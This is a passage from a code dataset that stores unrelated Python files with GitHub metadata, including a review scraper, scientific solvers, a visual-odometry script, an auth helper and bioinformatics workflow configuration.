of bytes: \" + str(noOfBytes) + \"\\n\")\n f.write(\" MD5 Hash: \" + h.md5 + \"\\n\")\n f.write(\" SHA256 Hash: \" + h.sha256 + \"\\n\")\n f.write(\"\\n\")\n\n\n def printExecutionTime(self):\n end = time.time()\n print(\"\")\n print(\"Execution Time: \" + str(end-self.startTime)[0:8] + \" sec\")\n print(\"\")","repo_name":"5f0ne/hexdump","sub_path":"src/hexdumper/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15612390434","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 2 19:08:03 2020\r\n\r\n@author: Shashank Sapaliga, Shashwat Sagar, Ishpreet Kaur, Dhwani Shah\r\n\"\"\"\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport csv\r\n\r\nclass Scrapper():\r\n def __init__(self):\r\n \r\n with open('OnePlus8_reviews.csv', 'w', encoding='utf-8', newline='') as file:\r\n writer = csv.writer(file)\r\n for i in range (1,20): \r\n url ='https://www.amazon.in/OnePlus-Mirror-Black-128GB-Storage/product-reviews/B085J17VVP/ref=cm_cr_arp_d_paging_btm_next_2?ie=UTF8&reviewerType=all_reviews&pageNumber='+str(i)\r\n r = requests.get('http://localhost:8050/render.html',params={'url':url, 'wait':2}) \r\n soup = BeautifulSoup(r.text, 'html.parser') \r\n reviews = soup.find_all('div', {'data-hook':'review'})\r\n for item in reviews:\r\n review_comments = item.find('span',{'data-hook':'review-body'}).text.strip()\r\n writer.writerow([review_comments]) \r\n print(\"Data has been successfully Scrapped from Amazon Website for OnePlus 8\") \r\n \r\n ","repo_name":"shashwatsagar/ReviewSummarizer","sub_path":"CustomerReviewSummarizer/WebScrapper/Scrapper.py","file_name":"Scrapper.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26382467048","text":"from typing import List\n\nimport torch\nfrom mr_node.data import Data\nfrom mr_node.utils import pairwise\n\n\nclass ODEFunc(torch.nn.Module):\n data: Data\n device: torch.device\n start_time: int\n\n def __init__(\n self,\n data: Data,\n device: torch.device,\n *,\n func_dim: int,\n fc_dims: List[int],\n ) -> None:\n super().__init__()\n\n self.data = data\n self.device = device\n\n input_dim = (\n func_dim\n + self.data.weather_at_time(torch.Tensor([0]).to(self.device)).shape[1]\n )\n self.fcs = torch.nn.ModuleList(\n (\n [torch.nn.Linear(input_dim, fc_dims[0])]\n + [\n torch.nn.Linear(input_dim, output_dim)\n for input_dim, output_dim in pairwise(fc_dims)\n ]\n + [torch.nn.Linear(fc_dims[-1], func_dim)]\n )\n if fc_dims\n else [torch.nn.Linear(input_dim, func_dim)]\n )\n\n for module in self.fcs.modules():\n if isinstance(module, torch.nn.Linear):\n torch.nn.init.normal_(module.weight, mean=0, std=0.1)\n torch.nn.init.constant_(module.bias, val=0)\n\n def forward(self, t: torch.Tensor, x: torch.Tensor) -> torch.Tensor:\n if t.dim() == 0:\n t = t.unsqueeze(0)\n if x.dim() == 0:\n x = x.unsqueeze(0)\n\n t = t + self.start_time\n weather = self.data.weather_at_time(t)\n x = torch.cat([weather, x], dim=-1).to(self.device)\n\n for fc in self.fcs[:-1]:\n x = fc(x)\n x = torch.tanh(x)\n x = self.fcs[-1](x)\n return x\n","repo_name":"UofTrees/ProjectX2020","sub_path":"mr_node/model/odefunc.py","file_name":"odefunc.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"21227932148","text":"\"\"\"\nModule 
for the logging system of saving processes.\n\"\"\"\n\nimport os\nfrom datetime import date, datetime\nimport logging\nimport json\nimport os\n\n\n# Make global variables at import time\ncurrent_date = date.today().strftime(\"%d-%m-%Y\")\ncurrent_time = datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")\nsave_folder = \"logs\"\nlog_filename = os.path.join(save_folder, current_time + \".log\")\n\n\ndef logger_setup(\n save_folder_path: str,\n filename: str = None,\n filemode: str = 'a',\n format: str = '%(asctime)s - %(message)s',\n level: int = logging.INFO,\n datefmt: str = '%d-%m-%y %H:%M:%S'\n):\n \"\"\"\n Setup for logging. This function should be called from the main thread before other threads are started.\n\n After setting the base directory, logger will will create a folder for every date called,\n and files will be saved in that folder with names of the current time.\n\n Args:\n save_folder_path: Base folder path of where to save the logging files to.\n Arguments passed to the logging.basicConfig:\n filename: Defaults to current time in the format d-m-y_H-M-S.\n filemode: Defaults to 'a'.\n format: Defaults to '%(asctime)s - %(message)s'.\n level: Defaults to logging.INFO.\n datefmt: Defaults to '%d-%m-%y %H:%M:%S'.\n \"\"\"\n\n current_date = date.today().strftime(\"%d-%m-%Y\")\n current_time = datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")\n\n save_folder = os.path.join(save_folder_path, current_date)\n if not os.path.isdir(save_folder):\n os.mkdir(save_folder) # Create directory\n\n log_filename = os.path.join(save_folder, current_time + \".log\")\n if not filename:\n filename = log_filename\n logging.basicConfig(\n filename=filename,\n filemode=filemode,\n format=format,\n level=level,\n datefmt=datefmt)\n\n\nclass Logger:\n \"\"\"\n Class for logging info into the .log file based on settings passed by the logger setup.\n Methods also print to the standard output.\n \"\"\"\n current_save_folder_path = save_folder\n\n @staticmethod\n def log(log_entry: str, out_print: bool = True, indent: int = 0) -> None:\n \"\"\"\n logging function for saving logs to the log file and printing to console.\n\n Args:\n log_entry: String to be logged and printed(if set)\n out_print: If log should be printed to the console. Defaults to True.\n indent: How many indents(4 spaces) should be put in front of the string to output.\n \"\"\"\n logging.info(log_entry)\n if out_print:\n if indent == 0:\n print(log_entry)\n else:\n print((indent * 4) * \" \" + log_entry)\n\n @staticmethod\n def log_dict(log_entry: dict, entry_name: str = \"Dictionary\") -> None:\n \"\"\"\n logging function for saving logs of dictionaries to the log file and pretty printing to standard output.\n\n Args:\n log_entry: Dictionary to be pretty printed.\n entry_name: Name of dictionary.\n \"\"\"\n logging.info(log_entry)\n print(entry_name, end=\": \")\n print(json.dumps(log_entry, indent=4, sort_keys=False))\n","repo_name":"Bonaventure123/Repo3","sub_path":"venv/Lib/site-packages/_selenium_webdriver_extender/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1440875813","text":"import cv2\nimport numpy as np\nimport time\nfrom eulerAngles import EulerAngles\nimport math\n\nlk_params = dict(winSize=(15, 15), maxLevel=2, criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\ncamera_matrix = np.array([[477.70629631, 0., 305.66414982],\n [ 0., 477.83388597, 183.12365019],\n [ 0., 0., 1. 
]])\n\nf = 2.123139094711111\npp = (1.3585073325333332, 0.34335684410625)\nindex_params = dict(algorithm=6, trees=4)\nsearch_params = dict(checks=20) # or pass empty dictionary\n\n\n\n\ncap = cv2.VideoCapture(0)\nfast = cv2.FastFeatureDetector.create(threshold=25, nonmaxSuppression=True)\n_, prev_frame = cap.read()\nprev_frame = cv2.resize(prev_frame, (240, 135))\nprev_frame = cv2.GaussianBlur(prev_frame, (3, 3), 5)\nprev_frame = cv2.cvtColor(prev_frame, cv2.COLOR_BGR2GRAY)\nold_points = fast.detect(prev_frame)\nold_points = np.array([x.pt for x in old_points], dtype=np.float32)\nt_global = np.zeros((3, 1))\nR_global = np.array([[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1]])\nidentity = np.array([[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1]])\nR_global_euler = EulerAngles((0, 0, 0))\nwhile True:\n startTime = time.time_ns()\n _, frame = cap.read()\n frame = cv2.resize(frame, (240, 135))\n frame = cv2.GaussianBlur(frame, (3, 3), 5)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY, frame)\n current_frame = frame.copy()\n if old_points.shape[0] < 2000:\n old_points = fast.detect(prev_frame)\n old_points = np.array([x.pt for x in old_points], dtype=np.float32)\n new_points, st, err = cv2.calcOpticalFlowPyrLK(prev_frame, current_frame, old_points, None, **lk_params)\n st = st.reshape(st.shape[0])\n old_points = old_points[st == 1]\n new_points = new_points[st == 1]\n #E, _ = cv2.findEssentialMat(new_points, old_points, focal=1, pp=(0, 0), method=cv2.RANSAC, prob=0.999, threshold=1.0)\n E, _ = cv2.findEssentialMat(old_points, new_points, cameraMatrix=camera_matrix, method=cv2.RANSAC, prob=0.9, threshold=1.0)\n print(type(E))\n R1, R2, t = cv2.decomposeEssentialMat(E)\n R1_euler = EulerAngles(R1)\n R2_euler = EulerAngles(R2)\n if abs(abs(R1_euler.pitch) + abs(R1_euler.yaw)) > abs(abs(R2_euler.pitch) + abs(R2_euler.yaw)):\n R = R2\n else:\n R = R1\n\n t_global = t_global + R.dot(t)\n R_global = R.dot(R_global)\n R_euler = EulerAngles(R)\n R_global_euler = EulerAngles(R_global)\n cv2.imshow(\"Frame\", prev_frame)\n prev_frame = current_frame.copy()\n old_points = new_points.copy()\n key = cv2.waitKey(1)\n if key == 27:\n break\n endTime = str(1/((time.time_ns() - startTime)/1000000000))\n #print(str(t) + \" \" + str(endTime))\n #print(\"R1: \\n\" + str(R1_euler) + \"\\nR2: \\n\" + str(R2_euler) + \"\\nR: \\n\" + str(R_euler) + \"\\nGlobal: \\n\" + str(R_global_euler) + \"\\nTime: \" + endTime + \"\\n\")\n\n\n\n","repo_name":"AbhinavPeri/9-10th-Grade-Summer-OpenCV-Experiments","sub_path":"Optical Flow.py","file_name":"Optical Flow.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"744803349","text":"# pylint: disable=invalid-name,no-value-for-parameter\n''' Helper methods to handle authentication '''\n\nimport base64\nimport daedalus.config\nimport daedalus.exceptions\n\nfrom urlparse import urlparse\n\nfrom daedalus.common.auth.models import Caller\nfrom daedalus.common.db import DBSession\nfrom daedalus.config import ALLOWED_DOMAINS\n\ndef _parse_auth_string(auth_string):\n '''Pulls username and token out of the auth string.'''\n try:\n auth_type, data = auth_string.split(' ', 1)\n assert auth_type == 'Basic'\n return base64.b64decode(data).split(':', 1)\n except (AssertionError, TypeError, AttributeError, ValueError):\n raise daedalus.exceptions.InvalidAuthorizationHeader('Header is invalid: %r' % auth_string)\n\ndef _check_caller(username, token, callback_url):\n '''Checks the `username` and `token` match and 
`callback_url` is allowed.'''\n try:\n assert token == get_token(username)\n if callback_url:\n assert callback_url in ALLOWED_DOMAINS\n return True\n except AssertionError:\n return False\n except daedalus.exceptions.UnknownUsername:\n return False\n\ndef check_auth(auth_string, callback_url=None):\n '''Parses auth string and checks to make sure username and token match.'''\n if not auth_string:\n return False\n\n try:\n username, token = _parse_auth_string(auth_string)\n except daedalus.exceptions.InvalidAuthorizationHeader:\n return False\n\n if callback_url:\n netloc = urlparse(callback_url).netloc\n if netloc == '':\n return False\n callback_url = netloc\n\n return _check_caller(username, token, callback_url)\n\ndef get_username(auth_string):\n '''Gets the username from the auth_string.'''\n username, _ = _parse_auth_string(auth_string)\n return username\n\n@DBSession()\ndef get_token(username, _db_session):\n '''Gets the token for a given user from the auth dict.'''\n caller = _db_session.query(Caller).filter_by(username=username).first()\n if caller is None:\n raise daedalus.exceptions.UnknownUsername('No token for username: %r' % username)\n return caller.token\n","repo_name":"Millz0r/daedalus","sub_path":"daedalus/common/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3240975523","text":"from firedrake import *\nfrom alfi.transfer import *\nfrom firedrake.mg.utils import get_level\n\nfrom functools import reduce\n\nimport argparse\nimport numpy as np\nfrom petsc4py import PETSc\n\nparser = argparse.ArgumentParser(add_help=False)\nparser.add_argument(\"--nref\", type=int, default=1)\nparser.add_argument(\"--k\", type=int, default=2)\nparser.add_argument(\"--solver-type\", type=str, default=\"almg\")\nparser.add_argument(\"--gamma\", type=float, default=1e4)\nparser.add_argument(\"--dr\", type=float, default=1e8)\nparser.add_argument(\"--N\", type=int, default=10)\nparser.add_argument(\"--itref\", type=int, default=0)\nparser.add_argument(\"--nonzero-initial-guess\", dest=\"nonzero_initial_guess\", default=False, action=\"store_true\")\nparser.add_argument(\"--discretisation\", type=str, default=\"hdiv\")\nparser.add_argument(\"--mattype\", type=str, default=\"aij\")\nparser.add_argument(\"--galerkin\", dest=\"galerkin\", default=False, action =\"store_true\")\nargs, _ = parser.parse_known_args()\n\n\nnref = args.nref\ndr = args.dr\nk = args.k\nN = args.N\ngamma = Constant(args.gamma)\n\ndistp = {\"partition\": True, \"overlap_type\": (DistributedMeshOverlapType.VERTEX, 1)}\n\nhierarchy = \"uniform\"\ndef before(dm, i):\n for p in range(*dm.getHeightStratum(1)):\n dm.setLabelValue(\"prolongation\", p, i+1)\n\ndef after(dm, i):\n for p in range(*dm.getHeightStratum(1)):\n dm.setLabelValue(\"prolongation\", p, i+2)\n\ndef mesh_hierarchy(hierarchy, nref, callbacks, distribution_parameters):\n baseMesh = RectangleMesh(N, N, 4, 4, distribution_parameters=distp)\n if hierarchy == \"uniform\":\n mh = MeshHierarchy(baseMesh, nref, reorder=True, callbacks=callbacks,\n distribution_parameters=distribution_parameters)\n else:\n raise NotImplementedError(\"Only know uniform for the hierarchy.\")\n return mh\nmh = mesh_hierarchy(hierarchy, nref, (before, after), distp)\n\nmesh = mh[-1]\n\nif args.discretisation == \"hdiv\":\n V = FunctionSpace(mesh, \"BDM\", k)\n Q = FunctionSpace(mesh, \"DG\", k-1)\nelif args.discretisation == \"cg\":\n V = 
VectorFunctionSpace(mesh, \"CG\", k)\n    Q = FunctionSpace(mesh, \"DG\", 0)\nelse:\n    raise ValueError(\"please specify hdiv or cg for --discretisation\")\n\nZ = V * Q\n\nPETSc.Sys.Print(\"dim(V) = \", V.dim())\nPETSc.Sys.Print(\"dim(Q) = \", Q.dim())\n\nsol = Function(V)\nu = TrialFunction(V)\nv = TestFunction(V)\np = TrialFunction(Q)\nq = TestFunction(Q)\n\nbcs = [DirichletBC(V, Constant((0., 0.)), \"on_boundary\")]\n\nomega = 0.1 #0.4, 0.1\ndelta = 100 #10, 200\nmu_min = Constant(dr**-0.5)\nmu_max = Constant(dr**0.5)\n\ndef Max(a, b): return (a+b+abs(a-b))/Constant(2)\n\ndef chi_n(mesh):\n    X = SpatialCoordinate(mesh)\n    def indi(ci):\n        return 1-exp(-delta * Max(0, sqrt(inner(ci-X, ci-X))-omega/2)**2)\n    # indis = [indi(Constant((4*(cx+1)/3, 4*(cy+1)/3))) for cx in range(2) for cy in range(2)]\n    indis = []\n    np.random.seed(1)\n    for i in range(8):\n        cx = 2+np.random.uniform(-1,1)\n        cy = 2+np.random.uniform(-1,1)\n        indis.append(indi(Constant((cx,cy))))\n    return reduce(lambda x, y : x*y, indis, Constant(1.0))\n\ndef mu_expr(mesh):\n    return (mu_max-mu_min)*(1-chi_n(mesh)) + mu_min\n\ndef mu(mesh):\n    Qm = FunctionSpace(mesh, Q.ufl_element())\n    return Function(Qm).interpolate(mu_expr(mesh))\n\n#File(\"mu.pvd\").write(mu(mesh))\n\nsigma = Constant(100.)\nh = CellDiameter(mesh)\nn = FacetNormal(mesh)\n\ndef diffusion(u, v, mu):\n    if args.discretisation == \"cg\":\n        return (mu*inner(2*sym(grad(u)), grad(v)))*dx\n    else:\n        return (mu*inner(2*sym(grad(u)), grad(v)))*dx \\\n            - mu * inner(avg(2*sym(grad(u))), 2*avg(outer(v, n))) * dS \\\n            - mu * inner(avg(2*sym(grad(v))), 2*avg(outer(u, n))) * dS \\\n            + mu * sigma/avg(h) * inner(2*avg(outer(u,n)),2*avg(outer(v,n))) * dS\n\ndef nitsche(u, v, mu, bid, g):\n    if args.discretisation == \"cg\":\n        return 0\n    else:\n        my_ds = ds if bid == \"on_boundary\" else ds(bid)\n        return -inner(outer(v,n),2*mu*sym(grad(u)))*my_ds \\\n            -inner(outer(u-g,n),2*mu*sym(grad(v)))*my_ds \\\n            +mu*(sigma/h)*inner(v,u-g)*my_ds\n\nF = diffusion(u, v, mu_expr(mesh))\nfor bc in bcs:\n    if \"DG\" in str(bc._function_space):\n        continue\n    g = bc.function_arg\n    bid = bc.sub_domain\n    F += nitsche(u, v, mu_expr(mesh), bid, g)\n\nF += -10 * (chi_n(mesh)-1)*v[1] * dx\n\nif args.discretisation == \"hdiv\":\n    Fgamma = F + gamma*inner(div(u), div(v))*dx(degree=2*(k-1))\nelif args.discretisation == \"cg\":\n    Fgamma = F + gamma*inner(cell_avg(div(u)), cell_avg(div(v)))*dx(degree=2*(k-1))\nelse:\n    raise ValueError(\"please specify hdiv or cg for --discretisation\")\n\na = lhs(Fgamma)\nl = rhs(Fgamma)\n\n\ncommon = {\n    \"snes_type\": \"ksponly\",\n    \"mat_type\": args.mattype,\n    \"pmat_type\": args.mattype,\n    \"ksp_type\": \"fgmres\",\n    \"ksp_gmres_restart\": 300,\n    \"ksp_norm_type\": \"unpreconditioned\",\n    \"ksp_rtol\": 1.0e-6,\n    \"ksp_atol\": 1.0e-10,\n    \"ksp_max_it\": 500,\n    \"ksp_converged_reason\": None,\n    \"ksp_monitor_true_residual\": None,\n}\n\nsolver_lu = {\n    \"pc_type\": \"lu\",\n    \"pc_factor_mat_solver_type\": \"superlu_dist\",\n}\n\nsolver_hypre = {\n    \"pc_type\": \"hypre\",\n}\n\nmg_levels_solver = {\n    \"ksp_type\": \"fgmres\",\n    \"ksp_norm_type\": \"unpreconditioned\",\n    \"ksp_max_it\": 5,\n    \"pc_type\": \"python\",\n    \"pc_python_type\": \"matpatch.MatPatch\",\n}\n\n#mg_levels_solver = {\n#    \"ksp_type\": \"fgmres\",\n#    \"ksp_norm_type\": \"unpreconditioned\",\n#    \"ksp_max_it\": 5,\n#    \"pc_type\": \"jacobi\",\n#}\n\nsolver_mg = {\n    \"pc_type\": \"mg\",\n    \"pc_mg_type\": \"full\",\n    \"mg_levels\": mg_levels_solver,\n    \"mg_coarse_pc_type\": \"python\",\n    \"mg_coarse_pc_python_type\": 
\"firedrake.AssembledPC\",\n \"mg_coarse_assembled_pc_type\": \"lu\",\n \"mg_coarse_assembled_pc_factor_mat_solver_type\": \"superlu_dist\",\n}\n\nif args.solver_type == \"almg\":\n params = {**common, **solver_mg}\nelif args.solver_type == \"allu\":\n params = {**common, **solver_lu}\nelif args.solver_type == \"alamg\":\n params = {**common, **solver_hypre}\nelse:\n raise ValueError(\"please specify almg, allu or alamg for --solver-type\")\n\nif args.nonzero_initial_guess:\n sol.project(Constant((1., 1.)))\n\n\ndef get_prolong():\n if args.discretisation == \"cg\":\n V = Z.sub(0)\n Q = Z.sub(1)\n tdim = mesh.topological_dimension()\n vtransfer = PkP0SchoeberlTransfer((mu, gamma), tdim, hierarchy)\n return vtransfer.prolong\n else:\n return prolong\n\ndef get_transfers():\n V = Z.sub(0)\n Q = Z.sub(1)\n tdim = mesh.topological_dimension()\n vtransfer = PkP0SchoeberlTransfer((mu, gamma), tdim, hierarchy)\n transfers = {V.ufl_element(): (vtransfer.prolong, vtransfer.restrict, inject)}\n return transfers\n\ndef build_prolongation_matrix(prolong, V_coarse, V_fine):\n ''' From coarse to fine '''\n uc = Function(V_coarse)\n uf = Function(V_fine)\n\n ProOp = PETSc.Mat()\n ProOp.create(PETSc.COMM_WORLD)\n ProOp.setSizes([V_fine.dim(), V_coarse.dim()])\n ProOp.setType(args.mattype)\n ProOp.setUp()\n \n\n for icol in range(V_coarse.dim()):\n uc.dat.zero()\n if args.discretisation == \"cg\":\n uc.dat.data[int(icol/2)][icol%2] = 1.0\n else:\n uc.dat.data[icol] = 1.0\n arr = uc.vector().get_local()\n prolong(uc, uf)\n values = uf.vector().get_local()\n rows = np.where(np.absolute(values) > 1e-14)[0].astype(np.int32)\n values = values[rows]\n ProOp.setValues(rows, [icol], values)\n\n ProOp.assemblyBegin()\n ProOp.assemblyEnd()\n\n ## Save the prolongation matrix\n #viewer = PETSc.Viewer().createBinary(\"ProOp_\"+str(int(V_coarse.dim()))+\\\n # \"_dr\"+str(int(dr))+\\\n # \"_r\"+str(int(args.gamma))+\\\n # \".dat\",\\\n # PETSc.Viewer.Mode.WRITE)\n #viewer.pushFormat(viewer.Format.NATIVE)\n #viewer.view(ProOp)\n\n return ProOp\n\n# Build level operators\nif args.galerkin:\n levelOps = []\n M = assemble(a, bcs=bcs, mat_type=args.mattype)\n Afine = M.petscmat\n levelOps.append(Afine)\n level = nref\n Vf = V\n while level > 0:\n print(\"building level : \", level)\n Vc = FunctionSpace(mh[level-1], V.ufl_element())\n prolong = get_prolong()\n ProOp = build_prolongation_matrix(prolong, Vc, Vf)\n Acoarse = Afine.PtAP(ProOp)\n #bclevel = DirichletBC(Vc, Constant((0., 0.)), \"on_boundary\")\n #bc_idx = bclevel.nodes\n #nodes = []\n #for i in bc_idx:\n # nodes.append(2*i)\n # nodes.append(2*i+1)\n #Acoarse.zeroRowsColumns(nodes,diag=1)\n \n levelOps.append(Acoarse)\n Afine = Acoarse\n Vf = Vc\n level = level-1\n\ndef aug_jacobian(X, J, ctx):\n mh, level = get_level(ctx._x.ufl_domain())\n if args.galerkin:\n rmap, cmap = J.getLGMap()\n levelOps[nref-level].copy(J,structure=J.Structure.DIFFERENT_NONZERO_PATTERN)\n J.setLGMap(rmap, cmap)\n #viewer = PETSc.Viewer().createASCII(\"LevelOp_\"+str(int(level))+\\\n # \"_galerkin_J.dat\",\\\n # PETSc.Viewer.Mode.WRITE)\n #viewer.view(J)\n #else:\n #viewer = PETSc.Viewer().createASCII(\"LevelOp_\"+str(int(level))+\\\n # \".dat\",\\\n # PETSc.Viewer.Mode.WRITE)\n #viewer.view(J)\n\nfor i in range(args.itref+1):\n problem = LinearVariationalProblem(a, l, sol, bcs=bcs)\n solver = LinearVariationalSolver(problem,\n solver_parameters=params,\n post_jacobian_callback=aug_jacobian)\n\n if args.solver_type == \"almg\" and args.discretisation == \"cg\":\n transfermanager = 
TransferManager(native_transfers=get_transfers())\n solver.set_transfer_manager(transfermanager)\n\n solver.solve()\n with assemble(action(Fgamma, sol), bcs=homogenize(bcs)).dat.vec_ro as v:\n PETSc.Sys.Print('Relative residual with grad-div', v.norm()/norm(sol))\n\n# Write out solution\n#File(\"u.pvd\").write(sol)\n","repo_name":"MelodyShih/vvstokes-al","sub_path":"__history__/galerkin_vs_rediscretization.py","file_name":"galerkin_vs_rediscretization.py","file_ext":"py","file_size_in_byte":10159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27274769636","text":"import json\nimport pandas as pd\nimport os\nimport argparse\nfrom collections import defaultdict\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-json', required=True)\n parser.add_argument('-tab', required=True)\n parser.add_argument('-melt', action=\"store_true\")\n parser.add_argument('-bincov', action=\"store_true\")\n parser.add_argument('-delly', action=\"store_true\")\n parser.add_argument('-manta', action=\"store_true\")\n parser.add_argument('-process', action=\"store_true\")\n parser.add_argument('-PESR', action=\"store_true\")\n parser.add_argument('-baf', action=\"store_true\")\n parser.add_argument('-depth', action=\"store_true\")\n parser.add_argument('-cluster', action=\"store_true\")\n parser.add_argument('-contig', default='/cluster/home/qinqian/yangfan/phaseC_SV/input/hg38_contig_list.txt')\n args = parser.parse_args()\n \n if args.bincov:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['bincov.contigList'] = args.contig\n wdl_json['bincov.mask'] = '/cluster/home/qinqian/yangfan/phaseC_SV/software/WGD/refs/WGD_scoring_mask.rawCov.100bp.hg38.bed'\n wdl_json['bincov.inputSamplesFile'] = args.tab\n #wdl_json['bincov.outDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/cnmops/s394g01018_2'\n #wdl_json['bincov.outDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/cnmops/s394g01018_2_test'\n wdl_json['bincov.outDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/cnmops/dragon'\n os.system('mkdir -p %s' % wdl_json['bincov.outDir'])\n\n if args.manta:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['manta.inputSamplesFile'] = args.tab\n wdl_json['manta.refFasta'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta'\n wdl_json['manta.refFastafai'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai'\n wdl_json['manta.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/manta/DD_negative'\n os.system('mkdir -p %s' % wdl_json['manta.outputDir'])\n\n if args.delly:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['delly.inputSamplesFile'] = args.tab\n wdl_json['delly.refFasta'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta'\n wdl_json['delly.refFastafai'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai'\n wdl_json['delly.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/delly/DD_negative'\n os.system('mkdir -p %s' % wdl_json['delly.outputDir'])\n\n if args.melt:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['melt.inputSamplesFile'] = args.tab\n wdl_json['melt.refFasta'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta'\n wdl_json['melt.refFastafai'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai'\n wdl_json['melt.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/melt/DD_negative'\n os.system('mkdir -p %s' % 
wdl_json['melt.outputDir'])\n wdl_json['melt.MELT'] = '/cluster/home/qinqian/yangfan/phaseC_SV/software/MELTv2.0.5_patch/'\n\n if args.depth:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['collectDepth.inputSamplesFile'] = args.tab\n wdl_json['collectDepth.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/melt/DD_negative/'\n os.system('mkdir -p %s' % wdl_json['collectDepth.outputDir'])\n\n if args.baf:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['vcf2baf.inputSamplesFile'] = args.tab\n #wdl_json['vcf2baf.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/evidence/DD_negative'\n wdl_json['vcf2baf.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/evidence/dragon'\n os.system('mkdir -p %s' % wdl_json['vcf2baf.outputDir'])\n\n if args.PESR:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['collectPESR.inputSamplesFile'] = args.tab\n wdl_json['collectPESR.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/evidence/DD_negative'\n os.system('mkdir -p %s' % wdl_json['collectPESR.outputDir'])\n\n if args.process:\n wdl_json = {\n \"preprocess_pesr.min_svsize\": 50,\n \"preprocess_pesr.delly_vcf\": \"/cluster/home/qinqian/yangfan/phaseC_SV/dump/delly/s394g01018_test/R18055980LD01/R18055980LD01.delly.vcf\",\n \"preprocess_pesr.melt_vcf\": \"/cluster/home/qinqian/yangfan/phaseC_SV/dump/melt/s394g01018/R18055980LD01/melt.vcf\",\n \"preprocess_pesr.contigs\": \"/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai\",\n \"preprocess_pesr.sample\": \"R18055980LD01\",\n \"preprocess_pesr.manta_vcf\": \"/cluster/home/data_share/seq-data/raw-data/DRAGEN_SV/R18055981LD01/results/variants/candidateSV.vcf.gz\" ## must be uncompressed\n }\n\n if args.cluster:\n wdl_json = {\n \"cluster_pesr_algorithm.svtypes\": \"BND\",\n #\"cluster_pesr_algorithm.flags\": \"--call-null-sites --include-reference-sites\",\n \"cluster_pesr_algorithm.flags\": \" \",\n \"cluster_pesr_algorithm.svsize\": \"30\",\n \"cluster_pesr_algorithm.frac\": \"0.1\",\n #\"cluster_pesr_algorithm.blacklist\": \"/cluster/home/qinqian/yangfan/phaseC_SV/software/WGD/refs/WGD_scoring_mask.rawCov.100bp.hg38.bed\",\n \"cluster_pesr_algorithm.dist\": \"500\",\n \"cluster_pesr_algorithm.algorithm\": \"manta\",\n \"cluster_pesr_algorithm.contigs\": args.contig,\n \"cluster_pesr_algorithm.vcfs\": [s.strip() for s in open(args.tab).readlines()],\n \"cluster_pesr_algorithm.batch\": \"s394g01018\"\n }\n with open(args.json+'.filled', 'w') as out:\n json.dump(wdl_json, out)\n","repo_name":"qinqian/svwdltest","sub_path":"scripts/render_json_inputs.py","file_name":"render_json_inputs.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18176293871","text":"from preprocess.train_processor import TrainProcessor\nfrom trainers.random_forest_trainer import RandomForestTrainer\n\nx_columns = [\"mean_handAcclX\", \"mean_handAcclY\", \"mean_handAcclZ\",\n \"mean_legAcclX\", \"mean_legAcclY\", \"mean_legAcclZ\",\n \"mean_BodyX\", \"mean_BodyY\", \"mean_BodyZ\",\n \"mean_legGyroX\", \"mean_legGyroY\", \"mean_legGyroZ\",\n \"mean_handGyroX\", \"mean_handGyroY\", \"mean_handGyroZ\"]\ny_column = \"label\"\nprocessor = TrainProcessor(x_columns, y_column)\n\nall_paths = [\"chicken.csv\", \"cowboy.csv\", \"logout.csv\", 